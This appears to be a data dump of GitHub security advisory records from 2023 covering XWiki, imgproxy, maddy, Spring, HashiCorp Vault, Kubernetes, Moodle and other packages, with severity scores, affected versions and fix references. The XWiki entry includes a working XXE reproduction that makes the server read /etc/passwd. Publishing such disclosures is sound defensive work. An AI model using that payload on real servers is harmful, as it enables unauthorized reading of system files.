[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26464'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/wkx6grrcjkh86crr49p4blc1v1nflj3t'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230505-0008/'}]
|
{'cwe_ids': ['CWE-400', 'CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-10T23:48:32Z', 'nvd_published_at': '2023-03-10T14:15:00Z'}
|
1.4.0
|
GHSA-gx4f-976g-7g6v
|
2023-03-08T17:19:30Z
|
2023-03-08T17:19:30Z
| null |
['CVE-2023-27480']
|
XWiki Platform vulnerable to data leak via Improper Restriction of XML External Entity Reference
|
### Impact
Any user with edit rights on a document can trigger a XAR import on a forged XAR file, leading to the ability to display the content of any file on the XWiki server host.
Example to reproduce:
* Create a forget XAR file and inside it, have the following `package.xml` content:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<package>
<infos>
<name>&xxe;</name>
<description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description>
<licence></licence>
<author>XWiki.Admin</author>
...
```
* Upload it onto a wiki page (e.g. `XXE`) as an attachment (e.g. `test.xar`).
* Call the page using `http://localhost:8080/xwiki/bin/view/Main/XXE?sheet=XWiki.AdminImportSheet&file=test.xar`
You'll then notice that the displayed UI contains the content of the `/etc/passwd` file.
### Patches
The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1.
### Workarounds
You'd need to get XWiki Platform sources and apply the changes from https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434 to the `XarPackage` java class and then copy the modified version to your `WEB-INF/classes` directory (or rebuild the `xwiki-platform-xar-model` maven module and replace the one found in `WEB-INF/lib/`).
### References
* https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434
* https://jira.xwiki.org/browse/XWIKI-20320
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-xar-model'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1-milestone-3'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-xar-model'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-xar-model'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-gx4f-976g-7g6v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27480'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20320'}]
|
{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:19:30Z', 'nvd_published_at': '2023-03-07T19:15:00Z'}
|
1.4.0
|
GHSA-ch9g-x9j7-rcgp
|
2023-03-24T16:21:55Z
|
2023-03-19T18:30:24Z
| null |
['CVE-2023-1496']
|
imgproxy Cross-site Scripting vulnerability
|
Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/imgproxy/imgproxy/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.14.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1496'}, {'type': 'WEB', 'url': 'https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689'}, {'type': 'PACKAGE', 'url': 'https://github.com/imgproxy/imgproxy'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/de603972-935a-401a-96fb-17ddadd282b2'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-20T21:13:37Z', 'nvd_published_at': '2023-03-19T17:15:00Z'}
|
1.4.0
|
GHSA-4g76-w3xw-2x6w
|
2023-03-14T18:03:22Z
|
2023-03-14T18:03:22Z
| null |
['CVE-2023-27582']
|
Full authentication bypass if SASL authorization username is specified
|
### Impact
maddy 0.2.0 - 0.6.2 allows a full authentication bypass if SASL authorization username is specified when using the PLAIN authentication mechanisms. Instead of validating the specified authorization username, it is accepted as is after checking the credentials for the authentication username.
### Patches
maddy 0.6.3 includes the fix for the bug.
### Workarounds
There is no way to fix the issue without upgrading.
### References
* Commit that introduced the vulnerable code: https://github.com/foxcpp/maddy/commit/55a91a37b71210f34f98f4d327c30308fe24399a
* Fix: https://github.com/foxcpp/maddy/commit/9f58cb64b39cdc01928ec463bdb198c4c2313a9c
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/foxcpp/maddy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.6.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/foxcpp/maddy/security/advisories/GHSA-4g76-w3xw-2x6w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27582'}, {'type': 'WEB', 'url': 'https://github.com/foxcpp/maddy/commit/55a91a37b71210f34f98f4d327c30308fe24399a'}, {'type': 'WEB', 'url': 'https://github.com/foxcpp/maddy/commit/9f58cb64b39cdc01928ec463bdb198c4c2313a9c'}, {'type': 'PACKAGE', 'url': 'https://github.com/foxcpp/maddy'}, {'type': 'WEB', 'url': 'https://github.com/foxcpp/maddy/releases/tag/v0.6.3'}]
|
{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T18:03:22Z', 'nvd_published_at': '2023-03-13T22:15:00Z'}
|
1.4.0
|
GHSA-7phw-cxx7-q9vq
|
2023-03-28T13:39:35Z
|
2023-03-28T00:34:28Z
| null |
['CVE-2023-20860']
|
Spring Framework is vulnerable to security bypass via mvcRequestMatcher pattern mismatch
|
Spring Framework running version 6.0.0 - 6.0.6 or 5.3.0 - 5.3.25 using "**" as a pattern in Spring Security configuration with the mvcRequestMatcher creates a mismatch in pattern matching between Spring Security and Spring MVC, and the potential for a security bypass.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework:spring'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework:spring'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.26'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-20860'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-framework'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230505-0006/'}, {'type': 'WEB', 'url': 'https://spring.io/security/cve-2023-20860'}]
|
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-28T13:39:35Z', 'nvd_published_at': '2023-03-27T22:15:00Z'}
|
1.4.0
|
GHSA-g44v-6qfm-f6ch
|
2023-03-27T22:10:58Z
|
2023-03-21T06:30:17Z
| null |
['CVE-2023-1539']
|
Answer has Guessable CAPTCHA
|
Guessable CAPTCHA in GitHub repository answerdev/answer prior to 1.0.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1539'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/813ad0b9894673b1bdd489a2e9ab60a44fe990af'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/b4df67f4-14ea-4051-97d4-26690c979a28'}]
|
{'cwe_ids': ['CWE-307', 'CWE-804'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:32:31Z', 'nvd_published_at': '2023-03-21T05:15:00Z'}
|
1.4.0
|
GHSA-j83x-r9qq-9g4v
|
2023-03-15T19:17:36Z
|
2023-03-10T03:30:15Z
| null |
['CVE-2023-1307']
|
Froxlor is vulnerable to authentication bypass
|
Authentication Bypass by Primary Weakness in GitHub repository froxlor/froxlor prior to 2.0.13.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.13'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1307'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/6777fbf229200f4fd566022e186548391219ab23'}, {'type': 'PACKAGE', 'url': 'https://github.com/Froxlor/Froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5fe85af4-a667-41a9-a00d-f99e07c5e2f1'}]
|
{'cwe_ids': ['CWE-305'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-10T22:16:14Z', 'nvd_published_at': '2023-03-10T01:15:00Z'}
|
1.4.0
|
GHSA-v3hp-mcj5-pg39
|
2023-04-06T22:55:57Z
|
2023-03-30T03:30:38Z
| null |
['CVE-2023-0620']
|
HashiCorp Vault’s Microsoft SQL Database Storage Backend Vulnerable to SQL Injection Via Configuration File
|
HashiCorp Vault and Vault Enterprise versions 0.8.0 until 1.13.1 are vulnerable to an SQL injection attack when using the Microsoft SQL (MSSQL) Database Storage Backend. When configuring the MSSQL plugin, certain parameters are required to establish a connection (schema, database, and table) are not sanitized when passed to the user-provided MSSQL database. A privileged attacker with the ability to write arbitrary data to Vault's configuration may modify these parameters to execute a malicious SQL command when the Vault configuration is applied. This issue is fixed in versions 1.13.1, 1.12.5, and 1.11.9.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.0'}, {'fixed': '1.11.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0620'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/pull/19591'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-12-vault-s-microsoft-sql-database-storage-backend-vulnerable-to-sql-injection-via-configuration-file/52080/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/releases/tag/v1.11.9'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/releases/tag/v1.12.5'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/releases/tag/v1.13.1'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230526-0008/'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T20:43:55Z', 'nvd_published_at': '2023-03-30T01:15:00Z'}
|
1.4.0
|
GHSA-6cpg-gqgq-2rrr
|
2023-04-06T22:56:10Z
|
2023-03-31T03:30:30Z
| null |
['CVE-2023-1761']
|
phpMyFAQ Code Injection vulnerability
|
Code Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.12.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1761'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/128ef85f8e3ab7869d3107aa4d0b6867b53391d7'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/24c0a65f-0751-4ff8-af63-4b325ac8879f'}]
|
{'cwe_ids': ['CWE-79', 'CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:42:07Z', 'nvd_published_at': '2023-03-31T02:15:00Z'}
|
1.4.0
|
GHSA-59fq-727j-hm3f
|
2023-04-04T21:47:30Z
|
2023-03-02T23:21:02Z
| null |
['CVE-2022-2237']
|
keycloak-connect contains Open redirect vulnerability in the Node.js adapter
|
There is an Open Redirect vulnerability in the Node.js adapter when forwarding requests to Keycloak using `checkSSO` with query param `prompt=none`.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'keycloak-connect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.0.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak-nodejs-connect/security/advisories/GHSA-59fq-727j-hm3f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-2237'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak-nodejs-connect/commit/190a9470e234bbd9ac5d5de43f5a19aead9a2c21'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2097007'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak-nodejs-connect'}]
|
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T23:21:02Z', 'nvd_published_at': '2023-03-27T22:15:00Z'}
|
1.4.0
|
GHSA-jh36-q97c-9928
|
2023-03-10T22:45:03Z
|
2023-03-01T21:30:18Z
| null |
['CVE-2022-3294']
|
Kubernetes vulnerable to validation bypass
|
Users may have access to secure endpoints in the control plane network. Kubernetes clusters are only affected if an untrusted user can modify Node objects and send proxy requests to them. Kubernetes supports node proxying, which allows clients of kube-apiserver to access endpoints of a Kubelet to establish connections to Pods, retrieve container logs, and more. While Kubernetes already validates the proxying address for Nodes, a bug in kube-apiserver made it possible to bypass this validation. Bypassing this validation could allow authenticated requests destined for Nodes to to the API server's private network.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/kubernetes/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.25.0'}, {'fixed': '1.25.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/kubernetes/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.24.0'}, {'fixed': '1.24.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/kubernetes/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.23.0'}, {'fixed': '1.23.14'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/kubernetes/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.22.0'}, {'fixed': '1.22.16'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-3294'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/113757'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/VyPOxF7CIbA'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230505-0007/'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-10T22:45:03Z', 'nvd_published_at': '2023-03-01T19:15:00Z'}
|
1.4.0
|
GHSA-5g97-whc9-8g7j
|
2023-03-13T15:29:51Z
|
2023-03-06T06:30:18Z
| null |
['CVE-2023-26111']
|
node-static and @nubosoftware/node-static vulnerable to Directory Traversal
|
node-static and the fork @nubosoftware/node-static are vulnerable to Directory Traversal due to improper file path sanitization in the startsWith() method in the servePath function.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'node-static'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.11'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@nubosoftware/node-static'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.11'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26111'}, {'type': 'WEB', 'url': 'https://gist.github.com/lirantal/c80b28e7bee148dc287339cb483e42bc'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudhead/node-static'}, {'type': 'WEB', 'url': 'https://github.com/cloudhead/node-static/blob/master/lib/node-static.js#23L160-L163'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-NODESTATIC-3149928'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-NUBOSOFTWARENODESTATIC-3149927'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:28:43Z', 'nvd_published_at': '2023-03-06T05:15:00Z'}
|
1.4.0
|
GHSA-mfvg-qwcw-qvc8
|
2023-03-28T18:03:20Z
|
2023-03-23T20:00:10Z
| null |
['CVE-2023-25655']
|
baserCMS allows any file to be uploaded
|
There is a vulnerability that allows uploading any files to baserCMS.
This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If you are eligible, please update to the new version as soon as possible.
### Target
baserCMS 4.7.3 and earlier versions
### Vulnerability
Malicious files may be uploaded in Upload File Management.
### Countermeasures
Update to the latest version of baserCMS
Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_61105618
### Credits
- Taisei Inoue@GMO Cybersecurity by Ierae, Inc.
- Yusuke Akagi@Mitsui Bussan Secure Directions, Inc.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25655'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd'}, {'type': 'PACKAGE', 'url': 'https://github.com/baserproject/basercms'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5'}]
|
{'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T20:00:10Z', 'nvd_published_at': '2023-03-23T20:15:00Z'}
|
1.4.0
|
GHSA-prjm-2fj2-787f
|
2023-04-03T20:55:33Z
|
2023-03-23T21:30:17Z
| null |
['CVE-2023-28336']
|
Moodle may allow teachers to access the names of users they could not otherwise access
|
Insufficient filtering of grade report history made it possible for teachers to access the names of users they could not otherwise access.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0'}, {'fixed': '3.11.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.20'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28336'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/a931a7f8cec3657827268837b27962a13817ca2b'}, {'type': 'WEB', 'url': 'https://git.moodle.org/gw?p=moodle.git;a=commit;h=a931a7f8cec3657827268837b27962a13817ca2b'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/3QZN34VSF4HTCW3C3ZP2OZYSLYUKADPF/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=445068'}]
|
{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T23:08:26Z', 'nvd_published_at': '2023-03-23T21:15:00Z'}
|
1.4.0
|
GHSA-r47r-87p9-8jh3
|
2023-03-28T18:05:35Z
|
2023-03-23T21:30:19Z
| null |
['CVE-2023-20859']
|
Spring Vault vulnerable to insertion of sensitive information into a log file
|
In Spring Vault, versions 3.0.x prior to 3.0.2 and versions 2.3.x prior to 2.3.3 and older versions, an application is vulnerable to insertion of sensitive information into a log file when it attempts to revoke a Vault batch token.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.vault:spring-vault-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.vault:spring-vault-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-20859'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-vault'}, {'type': 'WEB', 'url': 'https://spring.io/security/cve-2023-20859'}]
|
{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T23:11:08Z', 'nvd_published_at': '2023-03-23T21:15:00Z'}
|
1.4.0
|
GHSA-vhrv-9f9g-rfrx
|
2023-03-14T23:03:09Z
|
2023-03-07T15:30:38Z
| null |
['CVE-2023-24781']
|
SQL Injection in Funadmin
|
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\MemberLevel.php.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'funadmin/funadmin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24781'}, {'type': 'WEB', 'url': 'https://github.com/funadmin/funadmin/issues/8'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T23:03:09Z', 'nvd_published_at': '2023-03-07T15:15:00Z'}
|
1.4.0
|
GHSA-m6f8-hjrv-mw5f
|
2023-03-27T22:17:57Z
|
2023-03-27T22:17:57Z
| null |
['CVE-2023-28640']
|
Apiman vulnerable to permissions bypass due to missing check on API key URL
|
### Impact
Due to a missing permissions check, an attacker with an authenticated Apiman Manager account may be able to gain access to API keys they do not have permission for if they correctly guess the URL. The URL includes Organisation ID, Client ID, and Client Version of the targeted non-permitted resource, and each of these can have arbitrary values.
While not trivial to exploit, it could be achieved by brute-forcing or guessing common names.
Access to the non-permitted API Keys could allow use of other users' resources without their permission (depending on the specifics of configuration, such as whether an API key is the only form of security).
### Patches
Apiman 3.1.0.Final and later resolves this issue.
### Workarounds
Only provide Apiman Manager accounts to known users, do not allow anonymous/unknown users to create an Apiman Manager account.
Note that this does **not** affect the Apiman Gateway.
### References
* [Blog post disclosing issue](https://www.apiman.io/blog/potential-permissions-bypass-disclosure/)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.apiman:apiman-manager-api-rest-impl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0.Final'}]}], 'database_specific': {'last_known_affected_version_range': '< 3.0.0.Final'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/apiman/apiman/security/advisories/GHSA-m6f8-hjrv-mw5f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28640'}, {'type': 'PACKAGE', 'url': 'https://github.com/apiman/apiman'}, {'type': 'WEB', 'url': 'https://www.apiman.io/blog/potential-permissions-bypass-disclosure/'}]
|
{'cwe_ids': ['CWE-269', 'CWE-280', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T22:17:57Z', 'nvd_published_at': '2023-03-27T21:15:00Z'}
|
1.4.0
|
GHSA-hw7c-3rfg-p46j
|
2023-06-16T17:45:49Z
|
2023-03-14T23:01:50Z
| null |
['CVE-2023-24535']
|
Panic leading to denial of service
|
Parsing invalid messages can panic.
Parsing a text-format message which contains a potential number consisting of a minus sign, one or more characters of whitespace, and no further input will cause a panic.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'google.golang.org/protobuf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.29.0'}, {'fixed': '1.29.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24535'}, {'type': 'WEB', 'url': 'https://github.com/golang/protobuf/issues/1530'}, {'type': 'WEB', 'url': 'https://go.dev/cl/475995'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1631'}]
|
{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T23:01:50Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-55vm-3vq3-4jpc
|
2023-03-13T15:32:39Z
|
2023-03-07T09:30:30Z
| null |
['CVE-2023-1240']
|
Answer vulnerable to Cross-site Scripting
|
Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.
|
